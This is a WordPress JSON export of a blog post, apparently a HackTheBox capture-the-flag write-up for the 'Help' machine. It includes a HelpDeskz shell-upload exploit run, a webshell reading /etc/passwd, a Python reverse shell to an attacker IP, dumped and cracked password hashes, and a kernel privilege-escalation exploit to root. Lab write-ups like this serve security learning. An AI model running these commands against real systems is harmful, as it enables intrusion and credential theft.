{"id":125,"date":"2019-05-26T12:44:53","date_gmt":"2019-05-26T12:44:53","guid":{"rendered":"http:\/\/www.unordnung.net\/?p=125"},"modified":"2019-05-26T12:44:53","modified_gmt":"2019-05-26T12:44:53","slug":"hackthebox-writeup-of-help","status":"publish","type":"post","link":"https:\/\/unordnung.net\/misc\/2019\/05\/hackthebox-writeup-of-help\/","title":{"rendered":"HackTheBox writeup of "Help""},"content":{"rendered":"

my first writeup for a hackthebox.eu machine called: Help, 10.10.10.120
\n$ nmap -Pn –script vuln 10.10.10.121
\nStarting Nmap 7.70 ( https:\/\/nmap.org ) at 2019-05-11 13:22 CEST
\nPre-scan script results:
\n| broadcast-avahi-dos:
\n| Discovered hosts:
\n| 224.0.0.251
\n| After NULL UDP avahi packet DoS (CVE-2011-1002).
\n|_ Hosts are all up (not vulnerable).
\nNmap scan report for 10.10.10.121
\nHost is up (0.041s latency).
\nNot shown: 997 closed ports
\nPORT STATE SERVICE
\n22\/tcp open ssh
\n80\/tcp open http
\n| http-cookie-flags:
\n| \/support\/:
\n| PHPSESSID:
\n|_ httponly flag not set
\n|_http-csrf: Couldn’t find any CSRF vulnerabilities.
\n|_http-dombased-xss: Couldn’t find any DOM based XSS.
\n| http-enum:
\n|_ \/support\/: Potentially interesting folder
\n|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
\n3000\/tcp open ppp
\nhttp:\/\/10.10.10.121\/support\/ fileupload through a helpdeskz installation
\nhttps:\/\/packetstormsecurity.com\/files\/138548\/helpdeskz-shell.txt
\n\/*submit_ticket_controller.php – Line 141*
\n$filename = md5($_FILES[‘attachment’][‘name’].time()).”.”.$ext;
\nfiles uploaded get get obfuscated similar to HackinOS<\/a> (Vulnhub) md5 of the filname and current time.
\nunfortunately .php files arent allowed on the machine. too bad. tried nullbyte filenames cmd.gif^@.php etc. no luck. ah ok it seems gifs are not allowed
\nat least https:\/\/packetstormsecurity.com\/files\/138548\/helpdeskz-shell.txt taught me how i could have improved my script for hackinOS.
\nhttps:\/\/vulners.com\/zdt\/1337DAY-ID-26838 filedownload looks promising
\nok as my colleauges from link protect suggested i tried again to upload a php file and not get confused by error messages. i tried, still no luck, but then i played around with the exploit script und looked at the original helpdeskz and realized that the exploit didnt add the proper upload directory and i had to point it myself…doh, it instantly worked:
\n$ python hackthebox\/help_expl.py http:\/\/10.10.10.121\/support\/uploads\/tickets\/ ja.gif0x00.php
\nHelpdeskz v1.0.2 – Unauthenticated shell upload exploit
\nfound!
\nhttp:\/\/10.10.10.121\/support\/uploads\/tickets\/337a897ebca88cc466ee237effd5ff01.php
\nhttp:\/\/10.10.10.121\/support\/uploads\/tickets\/337a897ebca88cc466ee237effd5ff01.php?cmd=cat%20\/etc\/passwd
\nGIF89a; root:x:0:0:root:\/root:\/bin\/bash daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin sys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin sync:x:4:65534:sync:\/bin:\/bin\/sync games:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin man:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin lp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin mail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin news:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin uucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin proxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin www-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin backup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin list:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin irc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin nobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:\/run\/systemd:\/bin\/false systemd-network:x:101:103:systemd Network Management,,,:\/run\/systemd\/netif:\/bin\/false systemd-resolve:x:102:104:systemd Resolver,,,:\/run\/systemd\/resolve:\/bin\/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:\/run\/systemd:\/bin\/false syslog:x:104:108::\/home\/syslog:\/bin\/false _apt:x:105:65534::\/nonexistent:\/bin\/false messagebus:x:106:110::\/var\/run\/dbus:\/bin\/false uuidd:x:107:111::\/run\/uuidd:\/bin\/false help:x:1000:1000:help,,,:\/home\/help:\/bin\/bash sshd:x:108:65534::\/var\/run\/sshd:\/usr\/sbin\/nologin mysql:x:109:117:MySQL Server,,,:\/nonexistent:\/bin\/false Debian-exim:x:110:118::\/var\/spool\/exim4:\/bin\/false
\ni’ve got RCE \ud83d\ude42
\ni tried a few reverse shells, a python one python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.250”,2323));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“\/bin\/sh”,”-i”]);’
\nworked
\ngot shell \ud83d\ude42
\ntty upgrade python -c ‘import pty; pty.spawn(“\/bin\/bash”)’
\npython -c ‘import pty; pty.spawn(“\/bin\/dash”)’
\nalso help@help:\/home\/help$ whoami
\nwhoami
\nhelp
\nuser \ud83d\ude42
\nenumerating i found
\n$ cat \/var\/www\/html\/support\/includes\/config.php
\n show databases;
\nshow databases;
\n+——————–+
\n| Database |
\n+——————–+
\n| information_schema |
\n| mysql |
\n| performance_schema |
\n| support |
\n| sys |
\n+——————–+
\n5 rows in set (0.00 sec)
\nuse support;
\nmysql> SELECT * FROM users;
\nSELECT * FROM users;
\n+—-+————+———————–+——————————–+——————————————+——————+——–+
\n| id | salutation | fullname | email | password | timezone | status |
\n+—-+————+———————–+——————————–+——————————————+——————+——–+
\n| 1 | 0 | helpme | helpme@helpme.com | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian\/Christmas | 1 |
\n(…)
\n| 53 | 0 | Foo Bar | foo@bar.nul | 439d32d3c8e4170db7c2bd3dce1ba29c0cec11b4 | NULL | 1 |
\n+—-+————+———————–+——————————–+——————————————+——————+——–+
\n53 rows in set (0.00 sec)
\n| 1 | 0 | helpme | helpme@helpme.com | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian\/Christmas | 1 |
\nc3b3bd1eb5142e29adb0044b16ee4d402d06f9ca sha1 godhelpmeplz
\n5d3c93182bb20f07b994a7f617e99cff md5 godhelpmeplz
\nwe got a passwd for the helpdeskz
\nwith cat <<EOF < enum.sh
\nscript here
\nEOF
\ni could manage to get my enumeration script on the box without having a real tty. to remember! after enum, i started looking for priv esc exploits for the configuration i found some exploits for the kernel version.
\nLinux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018
\nafter trying a few i found this one working https:\/\/www.exploit-db.com\/exploits\/45010
\n$ gcc bx.c -o bx
\n.\/bx
\n[.]
\n[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
\n[.]
\n[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
\n[.]
\n[*] creating bpf map
\n[*] sneaking evil bpf past the verifier
\n[*] creating socketpair()
\n[*] attaching bpf backdoor to socket
\n[*] skbuff => ffff8800369add00
\n[*] Leaking sock struct from ffff88000622a400
\n[*] Sock->sk_rcvtimeo at offset 472
\n[*] Cred structure at ffff88003aa15680
\n[*] UID from cred structure: 1000, matches the current: 1000
\n[*] hammering cred structure at ffff88003aa15680
\n[*] credentials patched, launching shell…
\n# cat \/root\/root.txt
\ncat \/root\/root.txt
\nb7fe6082dcdf0c1b1e02ab0d9daddb98
\n# whoami
\nwhoami
\nroot
\n\ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"

my first writeup for a hackthebox.eu machine called: Help, 10.10.10.120 $ nmap -Pn –script vuln 10.10.10.121 Starting Nmap 7.70 ( https:\/\/nmap.org ) at 2019-05-11 13:22 CEST Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for … Read moreHackTheBox writeup of "Help"<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,4],"tags":[15,30,80],"class_list":["post-125","post","type-post","status-publish","format-standard","hentry","category-ctf-writeup","category-to_remember","tag-ctf","tag-hackthebox","tag-writeup"],"_links":{"self":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/125","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/comments?post=125"}],"version-history":[{"count":0,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/125\/revisions"}],"wp:attachment":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/media?parent=125"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/categories?post=125"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/tags?post=125"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}